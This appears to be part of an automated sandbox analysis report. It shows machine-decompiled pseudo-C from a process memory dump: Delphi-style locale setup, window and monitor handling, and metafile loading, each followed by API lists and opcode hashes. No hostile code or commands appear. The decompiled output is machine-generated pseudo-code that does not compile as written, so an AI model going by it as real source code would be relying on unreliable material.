                                                                                • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004361E3
                                                                                • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00436205
                                                                                • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00436224
                                                                                • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043623E
                                                                                • SelectObject.GDI32(?,?), ref: 0043624B
                                                                                • ReleaseDC.USER32 ref: 00436265
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ObjectSelect$DesktopReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 1187665388-0
                                                                                • Opcode ID: 6328050413eb74116ad7d92f3afa9dced3ae8c7170b365d07b3f59a090ef8c9d
                                                                                • Instruction ID: 84461609b0ce5577f178a86038dc7842a2152db3a2ecfe340c7df496a6863dc3
                                                                                • Opcode Fuzzy Hash: 6328050413eb74116ad7d92f3afa9dced3ae8c7170b365d07b3f59a090ef8c9d
                                                                                • Instruction Fuzzy Hash: 4F313DB6A00219BFDB00DEEDCC85EAFBBBCAF09354B414565F504F7241C679AD048BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E0040AEE4(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				char _v32;
                                                                                				char _v36;
                                                                                				char _v40;
                                                                                				char _v44;
                                                                                				char _v48;
                                                                                				char _v52;
                                                                                				char _v56;
                                                                                				char _v60;
                                                                                				char _v64;
                                                                                				char _v68;
                                                                                				void* _t104;
                                                                                				void* _t111;
                                                                                				void* _t133;
                                                                                				intOrPtr _t183;
                                                                                				intOrPtr _t193;
                                                                                				intOrPtr _t194;
                                                                                
                                                                                				_t191 = __esi;
                                                                                				_t190 = __edi;
                                                                                				_t193 = _t194;
                                                                                				_t133 = 8;
                                                                                				do {
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_t133 = _t133 - 1;
                                                                                				} while (_t133 != 0);
                                                                                				_push(__ebx);
                                                                                				_push(_t193);
                                                                                				_push(0x40b1af);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t194;
                                                                                				E0040AD70();
                                                                                				E004099B8(__ebx, __edi, __esi);
                                                                                				_t196 =  *0x4877fc;
                                                                                				if( *0x4877fc != 0) {
                                                                                					E00409B90(__esi, _t196);
                                                                                				}
                                                                                				_t132 = GetThreadLocale();
                                                                                				E00409908(_t43, 0, 0x14,  &_v20);
                                                                                				E00404374(0x487730, _v20);
                                                                                				E00409908(_t43, 0x40b1c4, 0x1b,  &_v24);
                                                                                				 *0x487734 = E00408708(0x40b1c4, 0, _t196);
                                                                                				E00409908(_t132, 0x40b1c4, 0x1c,  &_v28);
                                                                                				 *0x487735 = E00408708(0x40b1c4, 0, _t196);
                                                                                				 *0x487736 = E00409954(_t132, 0x2c, 0xf);
                                                                                				 *0x487737 = E00409954(_t132, 0x2e, 0xe);
                                                                                				E00409908(_t132, 0x40b1c4, 0x19,  &_v32);
                                                                                				 *0x487738 = E00408708(0x40b1c4, 0, _t196);
                                                                                				 *0x487739 = E00409954(_t132, 0x2f, 0x1d);
                                                                                				E00409908(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                                				E00409C40(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                                				E00404374(0x48773c, _v36);
                                                                                				E00409908(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                                				E00409C40(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                                				E00404374(0x487740, _v44);
                                                                                				 *0x487744 = E00409954(_t132, 0x3a, 0x1e);
                                                                                				E00409908(_t132, 0x40b1f8, 0x28,  &_v52);
                                                                                				E00404374(0x487748, _v52);
                                                                                				E00409908(_t132, 0x40b204, 0x29,  &_v56);
                                                                                				E00404374(0x48774c, _v56);
                                                                                				E00404320( &_v12);
                                                                                				E00404320( &_v16);
                                                                                				E00409908(_t132, 0x40b1c4, 0x25,  &_v60);
                                                                                				_t104 = E00408708(0x40b1c4, 0, _t196);
                                                                                				_t197 = _t104;
                                                                                				if(_t104 != 0) {
                                                                                					E004043B8( &_v8, 0x40b21c);
                                                                                				} else {
                                                                                					E004043B8( &_v8, 0x40b210);
                                                                                				}
                                                                                				E00409908(_t132, 0x40b1c4, 0x23,  &_v64);
                                                                                				_t111 = E00408708(0x40b1c4, 0, _t197);
                                                                                				_t198 = _t111;
                                                                                				if(_t111 == 0) {
                                                                                					E00409908(_t132, 0x40b1c4, 0x1005,  &_v68);
                                                                                					if(E00408708(0x40b1c4, 0, _t198) != 0) {
                                                                                						E004043B8( &_v12, 0x40b238);
                                                                                					} else {
                                                                                						E004043B8( &_v16, 0x40b228);
                                                                                					}
                                                                                				}
                                                                                				_push(_v12);
                                                                                				_push(_v8);
                                                                                				_push(":mm");
                                                                                				_push(_v16);
                                                                                				E00404698();
                                                                                				_push(_v12);
                                                                                				_push(_v8);
                                                                                				_push(":mm:ss");
                                                                                				_push(_v16);
                                                                                				E00404698();
                                                                                				 *0x4877fe = E00409954(_t132, 0x2c, 0xc);
                                                                                				_pop(_t183);
                                                                                				 *[fs:eax] = _t183;
                                                                                				_push(E0040B1B6);
                                                                                				return E00404344( &_v68, 0x10);
                                                                                			}

























                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,0040B1AF,?,?,00000000,00000000), ref: 0040AF1A
                                                                                  • Part of subcall function 00409908: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 4232894706-2493093252
                                                                                • Opcode ID: 26a1346b2054bbf97c80b006f0a7e2c26dcba65b8b9294efc9de51d471659dcb
                                                                                • Instruction ID: dd7168d140dabf44b549f8ddecd6ea9c3e8e9b3ee97471e2bc34665e137c0820
                                                                                • Opcode Fuzzy Hash: 26a1346b2054bbf97c80b006f0a7e2c26dcba65b8b9294efc9de51d471659dcb
                                                                                • Instruction Fuzzy Hash: AA613B707042489BDB00FBA6CCA1A9E76A6DB89304F60943EE550BB3C6CB3CDD05875D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E0043302C(intOrPtr __eax, void* __ecx, char _a4) {
                                                                                				char _v5;
                                                                                				char _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				struct HWND__* _v24;
                                                                                				intOrPtr _v28;
                                                                                				void* _v32;
                                                                                				struct tagRECT _v48;
                                                                                				struct tagRECT _v64;
                                                                                				struct HWND__* _t53;
                                                                                				intOrPtr _t55;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t65;
                                                                                				intOrPtr _t79;
                                                                                				intOrPtr _t85;
                                                                                				intOrPtr _t87;
                                                                                				intOrPtr _t94;
                                                                                				intOrPtr _t99;
                                                                                				intOrPtr _t102;
                                                                                				void* _t103;
                                                                                				intOrPtr* _t105;
                                                                                				intOrPtr _t107;
                                                                                				intOrPtr _t111;
                                                                                				intOrPtr _t113;
                                                                                				struct HWND__* _t114;
                                                                                				intOrPtr _t115;
                                                                                				intOrPtr _t117;
                                                                                				intOrPtr _t118;
                                                                                
                                                                                				_t103 = __ecx;
                                                                                				_t102 = __eax;
                                                                                				_v5 = 1;
                                                                                				_t2 =  &_a4; // 0x43334d
                                                                                				_t114 = E00433464( *_t2 + 0xfffffff7);
                                                                                				_v24 = _t114;
                                                                                				_t53 = GetWindow(_t114, 4);
                                                                                				_t105 =  *0x486c60; // 0x487bfc
                                                                                				if(_t53 ==  *((intOrPtr*)( *_t105 + 0x30))) {
                                                                                					L6:
                                                                                					if(_v24 == 0) {
                                                                                						L25:
                                                                                						return _v5;
                                                                                					}
                                                                                					_t115 = _t102;
                                                                                					while(1) {
                                                                                						_t55 =  *((intOrPtr*)(_t115 + 0x30));
                                                                                						if(_t55 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t115 = _t55;
                                                                                					}
                                                                                					_t113 = E0043BD14(_t115);
                                                                                					_v28 = _t113;
                                                                                					if(_t113 == _v24) {
                                                                                						goto L25;
                                                                                					}
                                                                                					_t12 =  &_a4; // 0x43334d
                                                                                					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
                                                                                					if(_t60 == 0) {
                                                                                						_t18 =  &_a4; // 0x43334d
                                                                                						_t107 =  *0x4317f8; // 0x431844
                                                                                						__eflags = E00403740( *((intOrPtr*)( *_t18 - 0x10)), _t107);
                                                                                						if(__eflags == 0) {
                                                                                							__eflags = 0;
                                                                                							_v32 = 0;
                                                                                						} else {
                                                                                							_t20 =  &_a4; // 0x43334d
                                                                                							_v32 = E0043BD14( *((intOrPtr*)( *_t20 - 0x10)));
                                                                                						}
                                                                                						L19:
                                                                                						_v12 = 0;
                                                                                						_t65 = _a4;
                                                                                						_v20 =  *((intOrPtr*)(_t65 - 9));
                                                                                						_v16 =  *((intOrPtr*)(_t65 - 5));
                                                                                						EnumThreadWindows(GetCurrentThreadId(), E00432FC0,  &_v32);
                                                                                						_t127 = _v12;
                                                                                						if(_v12 == 0) {
                                                                                							goto L25;
                                                                                						}
                                                                                						GetWindowRect(_v24,  &_v48);
                                                                                						_push(_a4 + 0xfffffff7);
                                                                                						_push(_a4 - 1);
                                                                                						E004037B0(_t102, _t127);
                                                                                						_t79 =  *0x487b84; // 0x0
                                                                                						_t111 =  *0x4305d4; // 0x430620
                                                                                						if(E00403740(_t79, _t111) == 0) {
                                                                                							L23:
                                                                                							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                                                                								_v5 = 0;
                                                                                							}
                                                                                							goto L25;
                                                                                						}
                                                                                						_t85 =  *0x487b84; // 0x0
                                                                                						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
                                                                                							goto L23;
                                                                                						}
                                                                                						_t87 =  *0x487b84; // 0x0
                                                                                						if(E0043BD14( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
                                                                                							goto L25;
                                                                                						}
                                                                                						goto L23;
                                                                                					}
                                                                                					_t117 = _t60;
                                                                                					while(1) {
                                                                                						_t94 =  *((intOrPtr*)(_t117 + 0x30));
                                                                                						if(_t94 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t117 = _t94;
                                                                                					}
                                                                                					_v32 = E0043BD14(_t117);
                                                                                					goto L19;
                                                                                				}
                                                                                				_t118 = E004325B4(_v24, _t103);
                                                                                				if(_t118 == 0) {
                                                                                					goto L25;
                                                                                				} else {
                                                                                					while(1) {
                                                                                						_t99 =  *((intOrPtr*)(_t118 + 0x30));
                                                                                						if(_t99 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t118 = _t99;
                                                                                					}
                                                                                					_v24 = E0043BD14(_t118);
                                                                                					goto L6;
                                                                                				}
                                                                                			}
































                                                                                APIs
                                                                                  • Part of subcall function 00433464: WindowFromPoint.USER32(M3C,?,00000000,00433046,?,-0000000C,?), ref: 0043346A
                                                                                  • Part of subcall function 00433464: GetParent.USER32(00000000), ref: 00433481
                                                                                • GetWindow.USER32(00000000,00000004), ref: 0043304E
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00433122
                                                                                • EnumThreadWindows.USER32(00000000,00432FC0,?), ref: 00433128
                                                                                • GetWindowRect.USER32 ref: 0043313F
                                                                                • IntersectRect.USER32 ref: 004331AD
                                                                                  • Part of subcall function 004325B4: GlobalFindAtomA.KERNEL32 ref: 004325C8
                                                                                  • Part of subcall function 004325B4: GetPropA.USER32 ref: 004325DF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$RectThread$AtomCurrentEnumFindFromGlobalIntersectParentPointPropWindows
                                                                                • String ID: M3C$M3C
                                                                                • API String ID: 3421286612-1772212157
                                                                                • Opcode ID: 167005de3e12df1bc501e74554e0fdcc86c459c142df6451632031e8b72de865
                                                                                • Instruction ID: a128a9aac8d38b63d4cbe000c1c78fed1b90614d1cbd1cfb40740373f1eb891c
                                                                                • Opcode Fuzzy Hash: 167005de3e12df1bc501e74554e0fdcc86c459c142df6451632031e8b72de865
                                                                                • Instruction Fuzzy Hash: A4516071A002059FCB50DF69C884BAEBBF4AF08355F1491A6F914EB351D738EE41CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 00455753
                                                                                • GetWindowRect.USER32 ref: 004557AD
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004557E5
                                                                                • MessageBoxA.USER32 ref: 00455826
                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045589C,?,00000000,00455895), ref: 00455876
                                                                                • SetActiveWindow.USER32(?,0045589C,?,00000000,00455895), ref: 00455887
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Active$MessageRect
                                                                                • String ID: (
                                                                                • API String ID: 3147912190-3887548279
                                                                                • Opcode ID: 991e29146cb3f81c84a2e9932392e15928f57e88c8a078de1bc06f8c3ea20abf
                                                                                • Instruction ID: 27f95780b0de453b95edefb76a011dd12389370940b1ed7da23c547e447e93a7
                                                                                • Opcode Fuzzy Hash: 991e29146cb3f81c84a2e9932392e15928f57e88c8a078de1bc06f8c3ea20abf
                                                                                • Instruction Fuzzy Hash: FE413C75E00208AFDB44DBA9CD95FBE77F9EB48304F14446AF900EB392D678AE048B54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0042237E(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				int _v12;
                                                                                				BYTE* _v16;
                                                                                				intOrPtr _v18;
                                                                                				signed int _v24;
                                                                                				short _v26;
                                                                                				short _v28;
                                                                                				short _v30;
                                                                                				short _v32;
                                                                                				char _v38;
                                                                                				struct tagMETAFILEPICT _v54;
                                                                                				intOrPtr _v118;
                                                                                				intOrPtr _v122;
                                                                                				struct tagENHMETAHEADER _v154;
                                                                                				intOrPtr _t103;
                                                                                				intOrPtr _t115;
                                                                                				struct HENHMETAFILE__* _t119;
                                                                                				struct HENHMETAFILE__* _t120;
                                                                                				void* _t122;
                                                                                				void* _t123;
                                                                                				void* _t124;
                                                                                				void* _t125;
                                                                                				intOrPtr _t126;
                                                                                
                                                                                				_t124 = _t125;
                                                                                				_t126 = _t125 + 0xffffff68;
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t122 = __eax;
                                                                                				E0042221C(__eax);
                                                                                				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
                                                                                				if(_v38 != 0x9ac6cdd7 || E00420F04( &_v38) != _v18) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				_v12 = _v12 - 0x16;
                                                                                				_v16 = E0040272C(_v12);
                                                                                				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                                				 *[fs:eax] = _t126;
                                                                                				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x4224ef, _t124);
                                                                                				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                                				if(_v24 == 0) {
                                                                                					_v24 = 0x60;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                                				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                                				_v54.mm = 8;
                                                                                				_v54.xExt = 0;
                                                                                				_v54.yExt = 0;
                                                                                				_v54.hMF = 0;
                                                                                				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                				 *(_t103 + 8) = _t119;
                                                                                				if(_t119 == 0) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                                                				_v54.mm = 8;
                                                                                				_v54.xExt = _v122;
                                                                                				_v54.yExt = _v118;
                                                                                				_v54.hMF = 0;
                                                                                				DeleteEnhMetaFile( *(_t103 + 8));
                                                                                				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                				 *(_t103 + 8) = _t120;
                                                                                				if(_t120 == 0) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				 *((char*)(_t122 + 0x2c)) = 0;
                                                                                				_pop(_t115);
                                                                                				 *[fs:eax] = _t115;
                                                                                				_push(E004224F6);
                                                                                				return E0040274C(_v16);
                                                                                			}



























                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422422
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042243F
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042246B
                                                                                • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042248B
                                                                                • DeleteEnhMetaFile.GDI32(00000016), ref: 004224AC
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004224BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileMeta$Bits$DeleteHeader
                                                                                • String ID: `
                                                                                • API String ID: 1990453761-2679148245
                                                                                • Opcode ID: abbddc9a927c4a955fefd323be66bda2bbf2c1bae64d8e782b85a21f8be4cac0
                                                                                • Instruction ID: 44c40cd423b67ccf78083ae2a30d6f27b72ddf14c8e4186e4a4d03f68d1a050f
                                                                                • Opcode Fuzzy Hash: abbddc9a927c4a955fefd323be66bda2bbf2c1bae64d8e782b85a21f8be4cac0
                                                                                • Instruction Fuzzy Hash: FC412D75A00218EFDB00DFA9D985AAEB7F9EF48700F51806AF944F7241E7789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E00422380(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				int _v12;
                                                                                				BYTE* _v16;
                                                                                				intOrPtr _v18;
                                                                                				signed int _v24;
                                                                                				short _v26;
                                                                                				short _v28;
                                                                                				short _v30;
                                                                                				short _v32;
                                                                                				char _v38;
                                                                                				struct tagMETAFILEPICT _v54;
                                                                                				intOrPtr _v118;
                                                                                				intOrPtr _v122;
                                                                                				struct tagENHMETAHEADER _v154;
                                                                                				intOrPtr _t103;
                                                                                				intOrPtr _t115;
                                                                                				struct HENHMETAFILE__* _t119;
                                                                                				struct HENHMETAFILE__* _t120;
                                                                                				void* _t122;
                                                                                				void* _t123;
                                                                                				void* _t124;
                                                                                				void* _t125;
                                                                                				intOrPtr _t126;
                                                                                
                                                                                				_t124 = _t125;
                                                                                				_t126 = _t125 + 0xffffff68;
                                                                                				_v12 = __ecx;
                                                                                				_v8 = __edx;
                                                                                				_t122 = __eax;
                                                                                				E0042221C(__eax);
                                                                                				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
                                                                                				if(_v38 != 0x9ac6cdd7 || E00420F04( &_v38) != _v18) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				_v12 = _v12 - 0x16;
                                                                                				_v16 = E0040272C(_v12);
                                                                                				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                                				 *[fs:eax] = _t126;
                                                                                				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x4224ef, _t124);
                                                                                				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                                				if(_v24 == 0) {
                                                                                					_v24 = 0x60;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                                				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                                				_v54.mm = 8;
                                                                                				_v54.xExt = 0;
                                                                                				_v54.yExt = 0;
                                                                                				_v54.hMF = 0;
                                                                                				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                				 *(_t103 + 8) = _t119;
                                                                                				if(_t119 == 0) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                                                				_v54.mm = 8;
                                                                                				_v54.xExt = _v122;
                                                                                				_v54.yExt = _v118;
                                                                                				_v54.hMF = 0;
                                                                                				DeleteEnhMetaFile( *(_t103 + 8));
                                                                                				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                                				 *(_t103 + 8) = _t120;
                                                                                				if(_t120 == 0) {
                                                                                					E004200B4();
                                                                                				}
                                                                                				 *((char*)(_t122 + 0x2c)) = 0;
                                                                                				_pop(_t115);
                                                                                				 *[fs:eax] = _t115;
                                                                                				_push(E004224F6);
                                                                                				return E0040274C(_v16);
                                                                                			}


























                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422422
                                                                                • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042243F
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042246B
                                                                                • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042248B
                                                                                • DeleteEnhMetaFile.GDI32(00000016), ref: 004224AC
                                                                                • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 004224BF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                 • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileMeta$Bits$DeleteHeader
                                                                                • String ID: `
                                                                                • API String ID: 1990453761-2679148245
                                                                                • Opcode ID: 49b8e2e2ab0fed2dd6d06d3fb109950647f96a1ecb2c49f35fcb9d8d4e6d6fe3
                                                                                • Instruction ID: 665570bac44c4c60e8fe7534a9a744b194c8e8f5101b8de97ce5c6e0b6c4a068
                                                                                • Opcode Fuzzy Hash: 49b8e2e2ab0fed2dd6d06d3fb109950647f96a1ecb2c49f35fcb9d8d4e6d6fe3
                                                                                • Instruction Fuzzy Hash: 7F412D75A00218EFDB00DFA9D985AAEB7F9EF48700F51806AF944F7241E7789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E004264B4(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                                                                				void _v20;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				struct HMONITOR__* _t27;
                                                                                				struct tagMONITORINFO* _t29;
                                                                                				intOrPtr* _t31;
                                                                                
                                                                                				_t29 = _a8;
                                                                                				_t27 = _a4;
                                                                                				if( *0x487ac0 != 0) {
                                                                                					_t24 = 0;
                                                                                					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                                						_t29->rcMonitor.left = 0;
                                                                                						_t29->rcMonitor.top = 0;
                                                                                						_t29->rcMonitor.right = GetSystemMetrics(0);
                                                                                						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						asm("movsd");
                                                                                						_t31 = _t29;
                                                                                						 *(_t31 + 0x24) = 1;
                                                                                						if( *_t31 >= 0x4c) {
                                                                                							_push("DISPLAY");
                                                                                							_push(_t31 + 0x28);
                                                                                							L00406A28();
                                                                                						}
                                                                                						_t24 = 1;
                                                                                					}
                                                                                				} else {
                                                                                					 *0x487aa4 = E00426184(4, _t23,  *0x487aa4, _t27, _t29);
                                                                                					_t24 = GetMonitorInfoA(_t27, _t29);
                                                                                				}
                                                                                				return _t24;
                                                                                			}













                                                                                APIs
                                                                                • GetMonitorInfoA.USER32(?,?), ref: 004264E5
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042650C
                                                                                • GetSystemMetrics.USER32 ref: 00426521
                                                                                • GetSystemMetrics.USER32 ref: 0042652C
                                                                                • lstrcpy.KERNEL32(?,DISPLAY), ref: 00426556
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
